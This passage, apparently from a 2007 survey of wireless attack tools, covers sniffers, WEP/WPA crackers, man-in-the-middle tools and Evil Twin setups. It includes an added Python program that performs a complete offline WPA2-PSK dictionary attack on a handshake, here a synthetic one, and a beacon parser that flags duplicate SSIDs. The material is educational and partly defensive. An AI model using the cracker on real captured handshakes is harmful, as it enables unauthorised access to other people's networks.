Wireless Hacking Tools


Figure 2 shows a screenshot of Wireshark. Each color in the packet list indicates a different protocol that Wireshark has identified. When the user selects a packet, its decoded details are displayed in the pane below.

Sniffing programs work well for information that is sent in the clear. For encrypted traffic, an encryption key cracker is necessary. For 802.11, WPA2 is the latest wireless encryption standard and, at the time of writing, had not been broken. WPA and WEP are the two earlier schemes, and many tools are available that will recover their keys. AirSnort [6] is a well-known WEP cracker, and AirCrack [7] is an attack tool for WPA. The two differ in kind: a WEP cracker recovers the key from captured traffic regardless of how the key was chosen, whereas WPA "cracking" of a pre-shared-key network is an offline dictionary attack that tests candidate passphrases against a captured four-way handshake, so it succeeds only when the passphrase is weak.
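To make the distinction concrete, the following is an added example (not code from the paper or from the AirCrack project) that carries out the WPA/WPA2-PSK dictionary attack the paragraph describes, end to end, using only the Python standard library: derive the PMK from each candidate passphrase with PBKDF2, expand it to the key confirmation key, recompute the MIC of the captured EAPOL message, and stop when it matches. The SSID, MAC addresses, nonces and EAPOL frame are all constructed in the file, not captured from a real network; the SSID "TestNet" and the word list are assumptions of the example.

```python
"""Offline WPA/WPA2-PSK passphrase recovery reduced to its core steps.

Added example, not from the paper or from the AirCrack project: it shows why a
"WPA cracker" against a pre-shared-key network is a dictionary attack on a
captured four-way handshake rather than a break of the cipher. Standard library
only. The handshake below is constructed here, not captured from a network.
"""
import hashlib
import hmac

MIC_OFFSET = 81          # EAPOL header(4) + key-descriptor fields before the MIC field
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the PTK are the Key Confirmation Key that authenticates EAPOL frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key-descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_handshake(hs: dict, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = hs["eapol2"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = kck_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol2"]), captured_mic):
            return candidate
    return None


def make_handshake(passphrase: str, ssid: str = "TestNet") -> dict:
    """Constructed message 2 of a four-way handshake (synthetic values, not a capture)."""
    ap_mac = bytes.fromhex("00112233aabb")
    sta_mac = bytes.fromhex("66778899ccdd")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # EAPOL-Key body: descriptor type(1) key info(2) key length(2) replay counter(8)
    # nonce(32) IV(16) RSC(8) ID(8) MIC(16) key data length(2); key data omitted.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01"
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * MIC_LEN + b"\x00\x00")
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type Key
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol2": frame}


if __name__ == "__main__":
    hs = make_handshake("correct horse")
    print(crack_handshake(hs, ["password", "letmein", "correct horse", "qwerty"]))
```

The cost of the attack is one PBKDF2 computation (4096 HMAC-SHA1 iterations) per candidate, which is why the passphrase and not the cipher is what decides the outcome: a passphrase outside the attacker's word list is never recovered, while a dictionary word falls in a fraction of a second.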

Ettercap [8] and dsniff [9] are two popular man-in-the-middle attack tools. Both provide sniffing capabilities similar to Wireshark but go beyond it with the ability to modify data in transit. Again, both are available for many platforms. Ettercap even includes a tutorial on how to write your own plugin.

Tools such as Hotspotter [11], APsniff [12], APhunter [13], and KNSGEM [14] scan for wireless AP beacon signals. Although they are not attack tools as such, they can be used to locate wireless APs; KNSGEM will even place the APs on a Google Earth map. Attackers then set up their Evil Twin AP near these legitimate ones. HermesAP [15] and OpenAP [16] are two Linux-based tools that let the user set up phony APs. OpenWRT [17] and HyperWRT [18] are two open source projects that replace the factory firmware on Linksys's popular WRT line of APs; attackers can use these distributions to create fake APs.
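The AP locators above all work by decoding beacon frames, and the same decoding is what a defender needs to spot an Evil Twin. The following added example (not code from the paper or from any of the tools it names) parses raw 802.11 beacon frames into BSSID, SSID, channel and security information, then flags any SSID that is being advertised by more than one BSSID. The beacon frames are constructed inside the file, so no radio or capture library is needed; treating a duplicated SSID as an Evil Twin indicator is an assumption of this example, not a rule stated in the paper.

```python
"""Parse 802.11 beacon frames and flag SSIDs advertised by more than one BSSID.

Added example, not from the paper or from any of the AP-locator tools it names.
The beacon frames are constructed below (no radio or capture library needed).
Treating one SSID seen from two BSSIDs as an Evil Twin indicator is an
assumption of this example, not a rule the paper states.
"""
import struct
from collections import defaultdict

TAG_SSID, TAG_DS_PARAMS, TAG_RSN = 0, 3, 48
CAP_PRIVACY = 0x0010


def parse_beacon(frame: bytes) -> dict:
    """Decode the fields an AP locator needs from a raw beacon frame."""
    # MAC header: frame control(2) duration(2) addr1(6) addr2(6) addr3/BSSID(6) seq(2)
    fc = struct.unpack_from("<H", frame, 0)[0]
    if fc & 0x00FC != 0x0080:                # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    bssid = frame[16:22].hex(":")
    # Fixed body: timestamp(8) beacon interval(2) capability(2); tagged elements follow
    interval, cap = struct.unpack_from("<HH", frame, 32)
    info = {"bssid": bssid, "interval": interval, "privacy": bool(cap & CAP_PRIVACY),
            "ssid": None, "channel": None, "rsn": False}
    pos = 36
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) < length:
            raise ValueError("truncated information element")
        if tag == TAG_SSID:
            info["ssid"] = value.decode("utf-8", "replace")
        elif tag == TAG_DS_PARAMS and length == 1:
            info["channel"] = value[0]
        elif tag == TAG_RSN:
            info["rsn"] = True                # WPA2 (RSN) capable
        pos += 2 + length
    return info


def find_evil_twin_candidates(frames) -> dict:
    """Map each SSID advertised by more than one BSSID to its sorted list of BSSIDs."""
    seen = defaultdict(set)
    for frame in frames:
        b = parse_beacon(frame)
        if b["ssid"]:
            seen[b["ssid"]].add(b["bssid"])
    return {ssid: sorted(bssids) for ssid, bssids in seen.items() if len(bssids) > 1}


def build_beacon(bssid: str, ssid: str, channel: int, rsn: bool = True) -> bytes:
    """Constructed beacon (synthetic, not a capture): broadcast DA, BSSID as SA and addr3."""
    mac = bytes.fromhex(bssid.replace(":", ""))
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + mac + mac + b"\x00\x00"
    cap = 0x0401 | (CAP_PRIVACY if rsn else 0)   # ESS + short slot time, privacy if protected
    body = b"\x00" * 8 + struct.pack("<HH", 100, cap)
    body += bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    body += bytes([TAG_DS_PARAMS, 1, channel])
    if rsn:
        body += bytes([TAG_RSN, 2, 0x01, 0x00])   # RSN version field only; real IEs list suites
    return header + body


# Constructed sample: a legitimate protected CoffeeShop AP (seen twice), an open
# CoffeeShop clone on another channel, and an unrelated CorpNet AP.
SAMPLE_FRAMES = [
    build_beacon("00:11:22:33:44:55", "CoffeeShop", 6, rsn=True),
    build_beacon("66:77:88:99:aa:bb", "CoffeeShop", 1, rsn=False),
    build_beacon("aa:bb:cc:dd:ee:ff", "CorpNet", 11, rsn=True),
    build_beacon("00:11:22:33:44:55", "CoffeeShop", 6, rsn=True),
]

if __name__ == "__main__":
    for ssid, bssids in find_evil_twin_candidates(SAMPLE_FRAMES).items():
        print(f"{ssid!r} advertised by {len(bssids)} BSSIDs: {', '.join(bssids)}")
```

Duplicate SSIDs are normal on a multi-AP corporate network, so in practice the flagged list is compared against the BSSIDs the operator actually deployed; the open clone on a different channel in the sample is the pattern a rogue built from OpenWRT or HermesAP would typically show.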

Table 1 - Summary of confidentiality attack tools

Tool                                       Type of attack       Description
AirSnort                                   Encryption cracker   WEP key cracker (recovers the key from captured weak-IV traffic)
AirCrack                                   Encryption cracker   WPA cracker
Ettercap, dsniff, and Wireshark            Packet sniffing      Packet sniffers with traffic analysis; these also include tools to break encryption
Hotspotter, APsniff, APhunter, and KNSGEM  AP locator           Discovers WLANs by listening for beacon signals transmitted from APs
HermesAP and OpenAP                        Evil Twin            Used to set up a rogue AP
OpenWRT and HyperWRT                       Fake AP              Replacement firmware so APs can be reprogrammed to create a fake AP



3.0 Integrity Attacks

The idea of an integrity attack is to alter data while it is in transit. Recall that the integrity of data means it has not been altered in any way. This includes data deletion or addition, frame deletion or addition, or replay

12/19/2007 5:16 PM